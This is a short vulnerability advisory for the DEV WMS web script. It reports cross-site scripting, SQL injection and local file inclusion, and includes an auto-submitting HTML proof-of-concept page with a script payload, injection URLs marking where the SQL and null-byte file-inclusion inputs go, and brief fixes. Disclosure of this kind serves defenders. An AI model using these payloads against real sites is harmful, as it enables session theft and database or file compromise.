SecurityvulnsSECURITYVULNS:DOC:20261DEV WMS Multiple Vulnerabilities
Script : DEV WMS
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection )
Alert : High
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
Script Download : http://dev-wms.sourceforge.net/
XSS Vulnerability 1 :
Variable Sent Method : GET
Vulnerable Variable : session
Solution : filter session variable with htmlspecialchars() function …
Xss Vulnerability 2 :
Variable Sent Method : POST
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search
change example.com to script address in a real site and save as ircrash.html , open file with browser and see your
cookie .
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
<form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input
type="hidden" name="action" value="search"/>
<input type="hidden" name="kluc" value=""'''<>>>><script>alert('xss')</script>">
</form>
</body>
</html>
Solution : filter kluc variable with htmlspecialchars() function …
SQL Injection :
Method Of Send : GET
Vulnerable Variable : article
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]
Solution : Filter danger caracter for article variable …
Local file inclusion :
Method Of Send : GET
Vulnerable Variable : step
Address : http://Example.com/admin/index.php?start=install&step=file.type%00
Solution : Filter step variable with if function …
Tnx : God
HTTP://IRCRASH.COM